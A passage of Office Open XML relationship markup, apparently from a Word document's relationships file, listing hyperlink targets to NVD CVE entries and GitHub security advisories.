Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78456" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78462" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78463" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78504" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78505" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78507" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78511" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78512" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78514" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78517" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78518" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78519" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78521" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78524" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78525" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78526" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78834" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79376" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79602" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79674" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79744" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80074" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80077" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80080" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80081" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80083" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80085" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80096" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80465" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81352" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81385" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81543" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81952" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81955" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81996" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82536" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83941" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83992" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83996" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83998" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84187" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85049" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85051" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85053" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85094" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85175" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85430" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85432" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85455" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85684" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85877" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86076" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86083" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86730" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2018-1000164" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-25766" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-36939" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-37267" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0799" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12611" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13097" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33197" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46636" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55250" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62384" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62648" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62649" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62650" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63312" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66840" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67281" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69664" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70399" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71380" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71404" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71981" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73314" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73316" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74835" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75124" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75133" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75813" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75960" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76224" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76639" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77111" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77393" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78677" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78681" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78682" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79707" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80205" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80219" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82882" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83605" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83606" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83607" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83608" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83609" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83612" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83613" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83614" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83615" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83616" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83617" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83618" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83619" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84190" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84202" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84208" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84476" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84482" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85147" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85169" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85174" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85429" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85431" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85436" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85441" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85442" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85444" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85445" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85446" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85447" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85449" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85450" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85452" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85540" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85584" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85585" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85604" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85626" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85699" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85786" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86173" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86177" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86193" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86195" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86196" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86727" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86732" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86738" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2rrw-hpqm-36pv" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-6r2r-ww24-7h52" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-7r39-6q8m-qw68" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-j95f-988m-3j2f" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-m4f3-g4cq-hqrx" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-wv46-xpj8-pw53" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-35585" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34223" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56703" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61517" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64199" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70626" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71504" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74239" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75121" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75122" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75123" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75990" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75991" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76190" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76199" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77109" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 